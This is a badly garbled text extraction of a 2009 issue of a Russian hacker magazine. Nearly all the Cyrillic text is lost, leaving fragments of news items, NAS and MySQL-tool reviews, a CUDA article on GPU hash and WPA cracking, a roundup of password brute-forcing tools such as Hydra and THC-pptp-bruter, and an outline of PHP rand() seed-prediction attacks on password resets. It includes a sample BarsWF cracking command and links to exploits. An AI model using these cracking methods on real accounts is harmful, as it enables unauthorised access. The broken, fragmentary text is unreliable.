Хакер 2009 07 PDF

.
32
x 07 () 2009
.
210
:

07
7 (1
12 7
7)) 2 0 09
WEB-HACK 2.0 / SQL- INCLUDE-
SQL- include- . 60
CUDA ?
phpMyAdmin
127
PHP

. 24
. 56
. 28
,
. ,
, , .
.
. ,

, ,
:
- .
?
,
.
, Forb
, web-. :
,
.
nikitozz,
CONTENT
07(127)
004 MEGANEWS
FERRUM
018
PC_ZONE
024
PHPMYADMIN
028
CUDA ?
032
086
090
094
100
EASY-HACK
044
050
056
060
064
070
104
.NET-

PHP

Blind SQL Injection
X-TOOLS
116
120
126
082
Linux

GLOBAL POSITIONING TROJAN

AD ACTIVE DIRECTORY:

Linux'
132
076
Snort
SnortSAM - BASE
072
SUPERBARCODING WINDOWS 7
SYN/ACK
110
local remote file include
PyGame

AVR
PYTHON'A
040
LAMP
-:

136
140
143
144
PSYCHO:

6
E-MAIL
FAQ UNITED
FAQ
8.5
WWW2
web-
The 2009 SourceForge.net Community

Choice Awards program has announced that
phpMyAdmin is finalist for Best Tool or Utility
for SysAdmins and Best Tool or Utility for
Developers. This is great news but it's up to all
users to vote for us (you have until July 20 but
hey -- now is the perfect time to vote!).
024
DOUBLE BUFFERING
1. DRAW
graphics
image Back Butter
2. Biit
(copy)
image Back Butter
050
060
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)
/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
/DVD
090
>
Step
(step@real.xakep.ru)
MAGAZINE@REAL.XAKEP.RU
> Unix-
Ant
>

/PUBLISHING
>

119021, , . ,
. 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
(goryacheva@gameland.ru)
>

136

>

>
(strekneva@gameland.ru)
>

> -

>

(andrey@gameland.ru)
>

(devald@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.

.
.

:
content@gameland.ru
, , 2009

.
.
>> meganews
J3
PC27
PC27
J3
MIFRILL / MIFRILL@R EAL.XAKEP.RU /
Facebook the movie

, ,
, World of
Warcraft, , .
, ,
(Se7en), (Fight Club) 3 (Alien
3), (The Social
Network).
Facebook. , -
( , , , ,
, ).
, ,
, .

-
, , ..
X-slim
MSI. MSI X340 , - , , ,
. MSI X340 MacBook Air
. 1.32 Apple
0.4 , , 13.4"
(1366x768), Intel Core 2 Solo U3500 1.4 , 2
, Intel Graphics Media Accelerator 4500MHD
320 .
-
-
1.3 , D-Sub, LAN
HDMI, SD SDHC,
wi-fi 802.11n Bluetooth.
, MSI
.

x320, x400 x600
12, 14 15.4.
MCAFEE :
, FREE () MUSIC LYRICS ( ),
20% .
004
X 07 /127/ 09
>> meganews
PC27
Miranda 0.8
, QIP,
Miranda , Jabber, ,
Miranda IM, ,
. 0.8, ,
.
: ICQ
UTF8 QIP,
, ;
Jabber UI,
(XEP: 70, 83, 108, 147, 184, 224, 232 ..),
( ), - ,
; Yahoo Yahoo
9.x. ,
.
6 ,
25 .
?
, ,
, .
, . , , ,
, , . , STOP!
,
. ,
. , 7 , , , 90-95% . ,
black list , .
, .
, ,
,
( ,
). , ,
, ( 130.000 ),
.

,
19- Spaceport America. - 200 .
. ,
, ,
,
. 250 ,
$200.000.
, , Virgin
Galactic. ,
,
, , , . 2010
, 2014.
, 5
.
006
X 07 /127/ 09
>> meganews
PC27
J3
The Pirate Bay, , .

(, , , ), TPB
. , , ,
.
32-
1.92 . , 24 Kazaa.
RIAA - ,
, .
, ,
Moby. ,
, .
WINDOWS 7
2009 . .
22
128 , ?
,
Kingston 128 .
DataTraveler 200 , $546. 32, 64 128 ,
, . 213 120
. , Password
Traveler Windows ReadyBoost.
,
,
, , . Psion,
netbook (
Psion), ,

. ,
Psion , ,

. Psion Intel , Psion netbook
.
, , ,
. , , !
008
X 07 /127/ 09
>> meganews
RapidShare

.
,
RapidShare . ,

5000
. , ,

,

GEMA. GEMA
MPAA ,
60.000 ,
. ,
, ,

,

. RapidShare

,

.

.
,

Nec, , , . ,
NEC CRV43 ,
. curved
: 43" , .
, : 2880x900
, 0.02 , 200 /, 10000:1,
100% sRGB 99.3% Adobe RGB.
DVI-D HDMI 1.3 USB 2.0 . ,
, ,
$8000. ,
:).
CISCO SYSTEM, -
PRICEWERT, ,

30%.
, Interfilm
-

. .
, ,
interfilm.ru,
,
, Puz-Karapuz,
, .
. , , -
010
, , , . ,
,
, , Leaseweb
. , .
, Interfilm ,
,
interfilm.ru
.
500.000 .
X 07 /127/ 09
>> meganews
PC27

, The Pirate Bay,
7.1% . , , .
- , ,
, , .
,
. ,
,
TPB . , , 10.9%
.
ESET , CONFICKER
.

21.26% .
iPhone
Apple ,
, ,
.
WWDC 2009 Apple iPhone 3GS,
s Speed.
, ,
iPhone .
: 2.1 , - 3 ;
, 3 Mpx , , ; 7.2 Mbps HSDPA;
OpenGL|ES; , ,
,
. iPhone 3GS
, .
$199 16 $299 32
.

SYMANTEC.

22%.
Securelist.ru . ,
Securelist.com.
,
, , , .
,
Kaspersky Lab.
Viruslist.ru Spamtest.ru, ,
,
.
,
,
.
012
X 07 /127/ 09
>> meganews
HH.RU , IT- ,
.
IT-.
50.05%
Opera Unite -
Opera Unite Opera Software,

, ,
- , .
, Opera, ,
, ,
X 07 /127/ 09

-, Opera
. Unite,
labs.opera.com ,
,
. -,
,

. ,

. -,

.
, (
,
).
. , ,
,
. ,
, , ,
, . Unite, ,
, , , -, ,
, - - ,
, .
013
>> meganews
PC27
,
Mac OS X. 0.4-0.5%,

Apple-.
,
-
Dr.Web Mac OS X .
,
- ,
,
,
, , , Dr.Web Mac OS X
, Mac.
(, Dr.Web Security Space).

YOUTUBE

1700%.
E3
Microsoft
X-Box
360 Natal. ,
.

,
,
. -
, .
,
\. . -
,

. , ,
,
Nintendo Wii, , ,
, ,
.

, .
Natal ,
,
,
X-Box (http://www.xbox.
com),
YouTube: Natal Xbox 360.
Twitter
-
Twitter
-, , 2010
-
,
.
2010 Twitter
, ,
,
sms2twitter,
. ,

SMS, SMS
.
.
014
X 07 /127/ 09
>> meganews
,
Microsoft ,

. 2007 , Opera
Software, IE
Windows,
. Microsoft
, Windows 7, ,
Internet Explorer . MS , , ,
(, ,
?).
, , Microsoft
Windows , . Microsoft ,
IE 8 pack .
Nikon
Nikon
D5000
,
.
D5000 -
2.7", ,
, ,
, . 19 ,
Live View,

-, ,
X 07 /127/ 09
. , D90
HD D-Movie.
D5000
. ,
, -
12.3
, EXPEED,
11 , ,

.
015

30 Windows 7, ,
, . ? , !
, .
Velle - ,
.
:
Velle

Velle
Velle ,
VITAVEN, Velle

www.velleoats.com
X 07 /127/ 09
17
>> ferrum

.
, , ( , ) .
, . , ,
, ..,
.
, (, , NAS network attached storage)

, (
). ,
,

RAID .
RAID 0 , .
:
, .
, , ,
.
JBOD ,
,
:
D-Link DNS-323
Netgear ReadyNAS DUO RND2175
RaidSoni Icy Box IB-NAS4210-B
Thecus N2100
TRENDnet TS-S402
ZyXEL NSA220-EE
018
,
. , ,
.
RAID 1 . ,
. . ,
,
( ).
:
1 , 1 .
RAID 5 , . .
, , ,
,
. ,
, RAID 1: 2 .

, ,
.
,
, . ,
BitTorrent
web- -,

web-.

Western
Digital WD1002FBYS RAID 0.
,
,
CrystalDiskMark 2.2.
,

4 512 .
ftp.
:
, , , ,
.

NAS:
24 , .
,
( )
.
X 07 /127/ 09
>> ferrum
19000 .
10000 .

D-Link
DNS-323
7000 .
:
: LAN 10/100/1000 / Ethernet
HDD-: 2 3.5 SATA
/: 1 x USB
: CIFS/SMB, FTP
: UPnP
RAID: RAID 0, RAID 1, JBOD
: (UPnP AV),
iTunes, -, HTTP, FTP, BitTorrent-
, : 104 x 198 x 132
, ,
, , .

, .
, .
RAID-, ;
. , web-.

.
AFP NFS ; USB.

X 07 /127/ 09
NETGEAR
ReadyNAS DUO RND2175
:
: LAN 10/100/1000 / Ethernet
HDD-: 2 3.5 SATA
/: 3 x USB
: CIFS/SMB, AFP 3.1,
NFS v2 / v3, HTTP/S, FTP/S, RSYNC
: UPnP, Bonjour
RAID: X-RAID, Hot Swappable
: (UPnP AV), iTunes,
-, BitTorrent-,
, : 142 x 101 x 222

, , , . ,
. RND2175
Seagate Barracuda 7200.11 750 . BitTorrent,
UPnP AV.
. .
; RAID 0 .
019
>> ferrum
CRYSTAL DISK MARK, /
ZyXEL NSA220-EE
Random Write 4KB

RandomRead 4KB
Random Write 512KB
RandomRead 512KB
Sequential Write
Sequential Read
TRENDnet TS-S402
Thecus N2100
( )
D-Link DNS-323
0 5 10 15 20 25 30 35 40 45 50
8000 .
RaidSoni
Icy Box IB-NAS4210-B
:
: LAN 10/100/1000 / Ethernet
HDD-: 1 3.5 SATA
/: 1 x USB, 1 x USB B
: CIFS/SMB, NFS
: UPnP, Bonjour
RAID: n/a
: TwonkyMedia, iTunes, , BitTorrent-, USB.
, : 240x128x44
- . , ?
, , (
), ,
. RaidSoni Icy Box IB-NAS4210-B
,
USB-.
; - ,
, .
020
Thecus
N2100
8000 .
:
: 2 x LAN 10/100/1000 / Ethernet
HDD-: 2 3.5 SATA
/: 2 x USB
: CIFS/SMB, AFP, FTP,
NFS, HTTP
: UPnP
: (DLNA), iTunes,
-,
, : 160 x 85 x 200
- , ,
, .
:
NETGEAR ReadyNAS DUO RND2175, FTP . Ethernet- ,
Wi-Fi .
ISO Web-.
. - . , , .
X 07 /127/ 09
>> ferrum
FTP, /
ZyXEL NSA220-EE
TRENDnet TS-S402
Thecus N2100
D-Link DNS-323
000
FTP (download)
FTP (upload)
10
15
20
25
ZyXEL
NSA220-EE
TRENDnet
TS-S402
9000 .
:
: LAN 10/100/1000 / Ethernet
HDD-: 2 3.5 SATA
/: 2 x USB
: CIFS/SMB, FTP, NFS
: UPnP, Bonjour
RAID: RAID 0, RAID 1, Hot Swappable
: (UPnP AV),
iTunes, -, BitTorrent-
, : 120 x 200 x 120
,
. ,

50- . (, ).

, .

: .
BitTorrent; http ftp .
,
NAS D-Link DNS-323.
,
X 07 /127/ 09
10000 .
:
: LAN 10/100/1000 / Ethernet
HDD-: 2 3.5 SATA
/: 2 x USB
: CIFS/SMB, NFS, FTP,
HTTP
: UPnP
: (DLNA), iTunes,
-, HTTP, FTP, BitTorrent-,
YouTube, Flickr, FTP.
, : 202 x 113 x 142
,
ZyXEL. USB-
, .
:
( BitTorrent, , -, http ftp), YouTube, Flickr FTP,
PPPoE-. Acronis True
Image Home
(, ).
,
.
,

RAID-.
ZyXEL NSA220-EE
, -
. ,

NETGEAR ReadyNAS DUO
RND2175 Thecus N2100.z
021
-
, , , , . , : , , , , - .
, ,
. . eBay.com $20!
: , , . , !
www.lmlab.ru
,

!
1.
eBay
-
.
2.

.

: .

,

(
, ).

,
,
3.

. ,

,
. , ,
, ,

!.
,

Worldwide ( )

.
4.

Place Bid.
,

. Place
Bid ( ),
You
are the current high bidder.
,
. ,
-

.
?

? eBay
. , $300.
300
. ,

180. ,
300 180 + , , $5
$85,
.
5.

PayPal:
- , ,
,
.
:

Only confirmed address
,

PayPal, (
).
,
, .
6.
:
(, DHL, FedEx, UPS
..) (USPS
, Royal mail ,
..) .

,

- .
,
(
,
$40), , , .
>> pc_zone
STEP
/ STEP@GAMELAND.RU /

MySQL, , phpMyAdmin. -. .
,
.
, phpMyAdmin ,
. PHP
, .

AJAX.
,
.
,
? . ,
phpMyAdmin .
. , -
, , ,
SQL- .
HEIDISQL
phpMyAdmin, HeidiSQL (www.heidisql.
com) -. ,

.
.
grid
( ).
phpMyAdmin, ,
024
. HeidiSQL
,
, ,
.

,
,
,
.
,
.
SQL-.
,

//,

.
HeidiSQL
. ,
( ),
,
.
.

,
.
,

.
, HeidiSQL
.
, , ,
: HeidiSQL
SQL-.

.
, :
, , , .
.
HeidiSQL
.
. ,

,
, ACL- NTFS.
, ,
MySQL .
HeidiSQL
.
,
,

.
X 07 /127/ 09
phpMyAdmin is also very deeply documented

in a book written by one of developers
Mastering phpMyAdmin for Effective MySQL
Management, which is available in English,
Czech, German and Spanish.
To ease usage to a wide range of people,
phpMyAdmin is translated into 55 languages
and supports both LTR and RTL languages.
phpMyAdmin is a free software tool written in

PHP intended to handle the administration of
MySQL over the World Wide Web. phpMyAdmin
supports a wide range of operations with
MySQL. The most frequently used operations
are supported by the user interface (managing
databases, tables, fields, relations, indexes,
users, permissions, etc), while you still have the
ability to directly execute any SQL statement.
>> pc_zone
Since version 3.0.0, phpMyAdmin joined the

GoPHP5 initiative and dropped compatibility
code for older PHP and MySQL versions;
version 3 and later requires at least PHP 5.2
and MySQL 5. To use with older PHP or MySQL
versions, use the older (but still maintained)
branch of 2.x releases, which you can find on
the download page.

HEIDYSQL
,
SQL-
SQLYOG
?
, MySQL, .
(, phpMyAdmin!),

!
, MySQL
,
.
HTTP-

MySQL SQLyog (www.webyog.
com).
X 07 /127/ 09
SQLyongTunnel.php,
, . ? SQLyog
HTTPS.
, SQLyong SSH- ,

Secure Shell,
( ) SSH-.
, -,
SQLyog MySQL-, ,
-, ,
, ( 3306)
. SSH (, ), SSH,
MySQL .
HEIDYSQL

,
HTTP-. ,

, , . , SQLyon , , ,

025
>> pc_zone
INFO
info

HeidiSQL
,

MySQL-Front.

. , HeidiSQL
,
,
.
Portable-
HeidiSQL

.
DVD
dvd

MySQL

DVD-.
HTTP://WWW
links

, .
MySQL GUI Tools:
dev.mysql.com/
downloads/gui-tools.
Toad for MySQL:
www.toadsoft.com/
toadmysql.
EMS SQL Manager
for MySQL:
sqlmanager.net/
en/products/mysql/
manager.
026
SQLYOG

. ,

, .

, Smart Autocomplete

. SQLyog
.
,
,
( , , ..).
. ,
.

. , , .
SQLyog
,
.
: ,
, .. .
,
SQLyog
,
, , , ,
.
SQLyog :
Community Enterprise-. ,
,
, ,
, SQLyog phpMyAdmin.
DBFORGE STUDIO
(www.devart.com)
: Hitachi, Honda, Samsung,
BMW, Siemens. , dbForge Studio
.

MySQL. ,
, , SQL-
, -
SSH- SQLYOG
.
, SQL-,
/
phpMyAdmin
phpMyAdmin , ,
, ?
,
, .
phpMyAdmin
-
. ,
web-
, .
SQL Buddy (www.sqlbuddy.com) PHP .
SQL Buddy Ajax,

(
phpMyAdmin).
JavaSript- MooTools,

. :
SQL Buddy .
RST MySQL 2.0 (rst.ghc.ru) ,
- . PHP-, 80 ,

MySQL. ,
,
,
.
X 07 /127/ 09
phpMyAdmin is also very deeply documented

in a book written by one of developers
Mastering phpMyAdmin for Effective MySQL
Management, which is available in English,
Czech, German and Spanish.
To ease usage to a wide range of people,
phpMyAdmin is translated into 55 languages
and supports both LTR and RTL languages.
RST MYSQL
PHPMYADMIN
PHP

DBFORGE

DBFORGE STUDIO
, .

, ,
,
.
,
dbForge Studio, .
Linux Mac OS
, SQuirreL SQL Client (www.squirrelsql.org)
(Oracle, MySQL, PostgreSQL, IBM DB2
20).
() . , Java
: , .
, . , ,
, , , .
, , IntelliSense ( (trl + Space)
), . ,
(Ctrl + t). , . ,
CREATE TABLE INSERT VALUES,
. (Ctrl + j)
.
, .
. SF,
SELECT * FROM, FORM FROM ..
X 07 /127/ 09
>> pc_zone
SQL-

,
,

.
, SQL-
. ,

, ,
SQL .

dbForge Studio.
, , ,
. ,
,
. ,
,
.
,
,
.
dbForge Studio
.
,
: Text,
DBF, HTML, MS Access, MS Excel, ODBC, PDF,
RTF, CSV XML.
.
, ,
SSL, SSH HTTP.

?
, , - :
Navicat -
?.

( Navicat).
,
.
, -
phpMyAdmin,
. z
027
>> pc_zone
CUDA
?

, , .
,
.
?

(GPU)
.
CUDA (Compute Unified Device
Architecture) 2007
, GPGPU
(General-Purpose computing on Graphics
Processing Units),
( )
, GeForce . CUDA ,
.
CUDA
GPU
:
!
,

CPU, CUDA
.
,

028
N .
CUDA
, , , ,
.
, (CPU)
? , CPU

.
CPU
.
GPU,
. CUDA
, ,

.
,
.
, CPU -,
.
,

. ,
, CPU.
GPU , .
,
, .
CUDA,
.
CUDA (Single Instruction Multiple
Data, SIMD) .
SIMD ,
.
SIMD-,

.
,
. GPU

. ,

,
(flow control). GPU
,

.

CUDA ,
X 07 /127/ 09
>> pc_zone
GPU
MAIN
MEMORY
1
COPY
PROCESSING DATA
INSTRUCT THE PROCESSING

2
MEMORY
FOR GPU
COPY THE RESULT

4
GPU
(GEFORCE 8800)
3
EXECUTE PARALLEL
IN EACH CORE
CPU GPU. (1) . (2) GPU. (3) GPU

. (4)

(:
-).
CUDA

GPU API.
,
,
,
.
CUDA

,
. , ,
CUDA
SDK
NVIDIA CUDA, DirectX,
OpenGL - GPU.

CUDA Toolkit.
CUDA Linux,
CUDA Ubuntu.
CUDA, runtime
nvcc. ,
GPU CPU.
X 07 /127/ 09
CPU (
, ) nvcc
C/C++ (
Linux gcc). ,
, ,
. , CUDA:
1) GeForce 8-
( );
2) 512 .
1:
MD5
,
, CUDA,
- ,
- (
).
BarsWF (http://3.14.by/ru/md5),

. ,
350 .
:
BarsWF_SSE2_x64.exe -h
21685d282d79098b89bdf5 a916b66c90
-X 030405313233 -min_len 12
-X , -min_len
(
15).
CUDA (www.nvidia.com/
object/cuda_get.html) AMD/Brook,
AMD (ati.amd.
com/support/driver.html).
CUDA
: Vernoux Md5 crack
(bvernoux.free.fr/md5/index.php), Lightning
Hash Cracker (www.elcomsoft.com/lhc.
html), cuMD5 (forums.nvidia.com/index.
php?showtopic=71548), nVCuda_md5 (forum.
antichat.ru/thread62728.html), InsidePro EGB
(www.insidepro.com/eng/egb.shtml).
2:
, MD5 .
? Rainbowcrack (projectrainbowcrack.com), CUDA.

,

GPU.
: NTLM-
,
,
500 .
rainbow, : 73904 !
029
>> pc_zone
MD5
CUDA
INFO
info
ATI

, ATI-Stream.
NVIDIA, ATI

OpenCL.
HTTP://WWW
links
jCUDA
CUDA Java:
www.gass-ltd.co.il/
en/products/jcuda.
CUDA
Python:
mathema.tician.de/
software/pycuda.

.NET:
www.gass-ltd.co.il/
en/products/cuda.net.
WARNING
info

.
030
RAINBOWCRACK ,
:
1. rtgen rainbow-;
2. rtsort
;
3. , rcrack
.
, Rainbowcrack
CUDA.
3:
Distributed Password Recovery (www.

elcomsoft.com/edpr.html) ,

CUDA-. ,
Word 2007, Excel 2007, PowerPoint,
Project 2007, Windows
(LM/NTLM). GPU CPU , CUDA-
.
: ,
256 . EDPR
: , . ,
. , .
,
NVIDIA 1 .
.
.
4:
CUDA
. CUDA
Badaboom (www.badaboomit.
com),
.
(, YouTube)
.mp4.

(BLOCKS),
(SHARED MEMORY)
.
(GRIDS)
Badaboom CUDA:
, , .
CPU,

NVIDIA GPU,

CUDA?
, CUDA,
NVIDIA: www.nvidia.com/object/
cuda_learn_products.html.
GeForce GeForce 8, 9, 100, 200 ,
NVidia Tesla Nvidia Quadro.
X 07 /127/ 09
>> pc_zone
CUDA TOOLKIT
.
, . :
, GPU, CPU
. ,
! multi-GPU.
GPU, ,
,
GPU
,
.
, Badaboom
,
CUDA,
. CyberLink PowerDirector (www.
cyberlink.com)
.
TMPGEnc
(www.tmpgenc.net)
.
X 07 /127/ 09
5:
WPA

Elcomsoft
Elcomsoft Wireless Security Auditor, CUDA
WPA-
10-15 ,
4- .
,
( ),
.
- Backtrack Linux

aircrack aircrack-ng-cuda, CUDA WPA.
GTX 285,
6-7 . ,
aircrack.
WPA-PSK
pyrit (code.google.com/p/
pyrit) coWPAtty (www.willhackforsushi.
com).

PMK-, -

. , pyrit
Nvidia CUDA (
ATI-Stream,
OpenCL, VIA Padlock)
20 PMK GeForce GTX
295 80 ,
.
YouTube , , 15
GeForce 8800 GT ,
mpi4py (mpi4py.scipy.org).
, (,
), aircrack-ng,
pyrit+ coWPAtty,
.

, CUDA .
,
CUDA . , ,
.
!z
031
10
TOOLS
10
TOOLS
>> pc_zone
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10
10
TOOLS
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10 TOOLS
z -. ,
, , . . ,
.
Brutus AET2
: Windows
2000 .
.
Brutus AET2 -

-.
HTTP ( ,
/), -
, ,
Telnet , : Brutus
.

, ,

( 60), . .

BRUTUS -

032
. ,
- ( HTTP Form)
(POST GET),
( Brutus
),
cookie, .
:
,
, .
,
.

HTTP FORM, TELNET, POP3, FTP
, JOHN THE
RIPPER
John the Ripper

www.openwall.com/john
: Windows, Unix
, , . ,
, ,
,
... ,
. ,
(),

.
,

, .
, ,
Windows? ,
John The Ripper,

. UNIX-, NTLM-,
, Kerberos,
.
,
MD4-, LDAP MySQL-.
John The Ripper .

,
.
.
,

X 07 /127/ 09
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
>> pc_zone
10
TOOLS
. ,
(ophcrack.sourceforge.net),
,
Rainbow-.
,
Windows Unix
10
GUI-

CLOUD
10
TOOLS
COMPUTING
.
TOOLS FSCrack v1.0.1 (www.foundstone.
10
com/us/resources/proddesc/fscrack.htm)
TOOLS
, ,
CLOUD ,

COMPUTING .
10
.
TOOLS

. 10

L0PHTCRACK
TOOLS
(, ) ,
25
Windows. L0phtCrack
Windows ,
: MD5
, ,
NTLMv2
Active Directory. . ,
,
.
.
,
25 (
Shadow.
Windows, MySQL, MSSQL, Oracle, SIP, VNC,
CISCO, WPA-PSK ..)
: , ,
.
: , dana
Dana99.
:

THC
, ,
. THC .
Hydra
.
, 2006 Symantec .
,
, :
,

.
LC6.
30
64- ,
, telnet, ftp, http, https,
. ,
smb, , .. , THCL0phtCrack
Hydra
,
.
CAIN AND ABEL
, , Pwdump (www.
foofus.net/fizzgig/pwdump), ophcrack
Cain and Abel

www.oxid.it/cain.html
: Windows
www.l0phtcrack.com
: Windows
THC-Hydra
freeworld.thc.org/thc-hydra
: Windows, Unix
10
TOOLS
10
TOOLS
10
L0PHTCRACK
SSH,
libssh.
,

:).
./
configure&make&make install
, .
:
R ;
e ns
, ;
C FILE
:;
o FILE
;
f :;
t TASKS ;
w TIME - (30 ).
Hydra

-! (73 z, pdf ).
,
, .
: Samba, FTP, POP3, IMAP,
Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC,

THC HYDRA
X 07 /127/ 09
033
>> pc_zone
10
TOOLS
10
10
INFO
info

WEP/
WPA

: Wi-Fi.
RPD-
DVD
dvd

,
.

!
HTTP://WWW
links

Python Perl:
http://www.darkc0de.
com/bruteforce.
: http://www.
passwords.ru/dic.htm
-
:
passcracking.ru;
milw0rm.com;
gdataonline.com;
www.md5hood.com;
www.hashchecker.
com.
024
034
10
TOOLS
10
TOOLS
ICQ, Socks5, PCNFS, Cisco, SSH, ICQ
TSGrinder
www.darknet.org.uk/2008/07/
tsgrinder-brute-force-terminalservices-server

RPD.

: . RPD
. , ,

RDP /,
.

. TSGrinder 5
, .
.
, , , l337, . , RPD-,
, ,
. Microsoft Simulated Terminal Server Client
tool, roboclient.
ftp://ftp.microsoft.com/ResKit/win2000/roboclient.zip
.
RPD-
RainbowCrack
project-rainbowcrack.com
: Unix, Windows
10
TOOLS
10
TOOLS
10
10
TOOLS
10
TOOLS
10
10
TOOLS
. :

10 .
TOOLS

:

.
.
,

( )
,
.

, .
RainbowCrack .
, CLOUD
COMPUTING
,
, . RainbowCrack ,
. ,
.

Rainbow-
Md5 Crack Monster v1.1

www.darkc0de.com/c0de/perl/
mcm.txt
: Unix, Windows
, , ,
-. ,
gdataonline.com , ( ).
, Md5
Crack Monster, Perl.
.
-
THC PPTP bruter

www.thc.org
: Unix
, VPN- - ? !
- THC
, public-
THC-pptp-bruter. PPTP-
(1723/TCP), ! :) ,
, -
,
,
(, MD5),
,
.

,

X 07 /127/ 09
10
TOOLS
10
TOOLS
10
TOOLS
10
TOOLS
10
10
TOOLS
10
>> pc_zone
10
TOOLS
10
OOLS

Microsoft Window Chap V2. :
, Windows, CISCO-.
Window Chap V1, , ,
:). , Microsoft
PPTP- .
,
:
. ,
. ,
, , , THC
. THC-pptp-bruter
, Microsoft,
300-400 .
, , ,
.
, pptp-bruter
.
.
VPN-
-t server -u users [options].

. CIFSPwScanner Java,
.

piggy 1.0.1
www.cqure.net/tools
: Windows,
Unix
Microsoft SQL , .
Piggy ,

, . ,

1433 (TCP), ,
, piggy.
,
.
MSSQL- z
WARNING
info

.

.
,

.
!
SMB
CIFSPwScanner
www.cqure.net/tools
: Windows, Unix
CIFS/SMB- ,
, ,
.
.
,

. : CifsPwScanner
X 07 /127/ 09
035
Microsoft
60 . 12 000 . . Microsoft , ,
, .
,

,
.
,
,
, . ,
Microsoft :).

,
,
.

,
e-mail, ,

. Microsoft?
Microsoft !
CALL-
email,
, call-
C . Microsoft
,

036
. ,

, - .
IT-
C
. :
30
29 .
Microsoft .
, call-
.
,
. . ,

. ,
,
,
,
.
, ,
Microsoft Certified Desktop Technician

/ Microsoft Certified Systems Engineer
,
, .
,

.
: 12000
,

Microsoft, 1400. ,
90%
.

(Knowledge Base)
.
,

.

,

. ,
X 07 /127/ 09

Call-,

support.microsoft.com/search/?adv=1.
, ,
, , , ,
.
,
, ,
, . -
,
. , ,
,
X 07 /127/ 09
,
Microsoft.
,

,

.

Call-
RDP-.
backconnect remote desktop,
Microsoft Easy
Assist. ,
, -
, , .

. :
,
, .
,
.

Fix It,

. , ,
037
MICROSOFT

.
, ,
. ,
, :

. ,
Fix It ,
, ,
. Fix It support.microsoft.com/
gp/cp_fixit_master/ru. 95%
. ,
Fix It.
. .
Microsoft Support Diagnostics Tool,
Windows 7,
Action Center.
,
,
.
, , ,
. ,
,
.
SUPPORT 2.0
,
. -

. e-mail,
, ,
. Microsoft . support.
microsoft.com.

, ,
, , ,
.
:
( MSDN!).
038
FIX IT

Microsoft
support.microsoft.com. , ,
,
, , , .
, Fix It
.
No more tears, -,
. -
.
: , e-mail, .
, .
- http://technet.microsoft.
com. ,
. , Microsoft
MVP, MCT, MCSE. ,
support.microsoft.com/
gp/commnews.
. ,
:
Malicious Software Removal Tool OneCare Safety
(onecare.live.com/site/en-us/default.htm).
Call- Microsoft 12000 .
.
10%
, .
: 98% , Microsoft .
X 07 /127/ 09
Microsoft
Fix it

.
.
Q: ,
?
?
A: . MS,
. -
, , ,
SP (1,2...6),
.
, , ( :)). , ,
, workaround ( ) (SP).
, Visio 2007
() . ..
. Microsoft Office Visio SP2. Internet
Explorer 8.0 cookies . , IE6.0/7.0
.
dll,
Windows Update.
Q: ?
, ?
A: . Microsoft Virtual PC
2008- Hyper-V
. ,
. ,
.
. -
X 07 /127/ 09
. , , ,
.
Q:
. ?
?
A: Microsoft Easy Assist. - Easy Assist.

ActiveX .
,

.
:
format c:, ok?
ActiveX-
.
Easy Assist .
, ,

, . , ,
, . ,
.
Q: - ,

?
A: .
,
.
Q: ,
?
A: ,
. , (
)
. ,
, ,
.

, .
039
RAND
IS NOT RAND
>>
RAND
IS NOT RAND
RAND
IS NOT RAND
RAND
IS NOT RAND
RAND
IS NOT RAND
RAND
IS NOT RAND
RAND
IS NOT RAND
ELECT
RAND
IS NOT RAND
RAND
IS NOT RAND
PHP
>>
PHP. , , , ,
( , , , , ). ? ? ? ? , PHP - .

,
, M4G'a Raz0r'a. , , , .

, .
, .

PHP -,
, :
rand() mt_rand().
.
,
040
, ,
. ,
, .
-,
rand (mt_rand) , . SEED

's': srand (mt_srand). ,
SEED,
,
rand (mt_rand),
,

. -, SEED
srand (mt_srand) (
).
srand (mt_srand)
( ),
PHP SEED .
, SEED
2^32, . ,
SEED PHP srand
(mt_srand). rand (srand)
, *nix Windows.

rand() SEED
rand(). :
"$SEED=rand();srand($seed);$SEED=r
and();...".
X 07 /127/ 09
RAND
IS NOT RAND
>>
RAND
IS NOT RAND
PUNBB
1.2.16 BLIND PASSWORD
RANDRAND
RECOVERY VULNERABILITY
LOG EXPLOIT: XMB 1.9.11 RANDOM

PASSWORD RESET VULNERABILITY
,
SEED,
rand(),
.
:
rand() SEED.
WINDOWS rand() ( , SEED)
32767. ,
( Raz0r'
).
*NIX SEED 2^32.
, mt_rand (mt_srand)
PHP.
PHP 4.x.x<=5.2.0
, mt_rand(), 2^31. 31
:
"mt_rand(1)=mt_rand(2);mt_
rand(3)=mt_rand(4);...".
SEED
2^32, -

(2^31). 50% .
PHP >=5.2.1 mt_rand()
2^32. SEED,
mt_rand(2^32), (2^32).

rand (srand) mt_rand (mt_srand)
. ,
srand() mt_rand()
. , -
.
:
1.
rand (srand, mt_rand, mt_srand) SEED.
2. Keep-Alive
.
3. PHP (
cgi fastcgi).
X 07 /127/ 09
4.
(suhoshin) .
PHP-,
, .
.
!
,
:
1. - ,

.

Wordpress
,
(milw0rm.com/exploits/6421).
,
,
SEED.
2. -
-,
.
Raz0r'a
Wordpress' PhpBB ,
PhpBB mt_rand
(raz0r.name/wp-content/uploads/2008/08/wp1.
html).
3. SEED

rand (mt_rand).
, Raz0r'a SMF<=1.1.5
Admin Reset Password Exploit (win32)
WINDOWS (raz0r.name/articles/magiyasluchajnyx-chisel-chast-2).
, ?
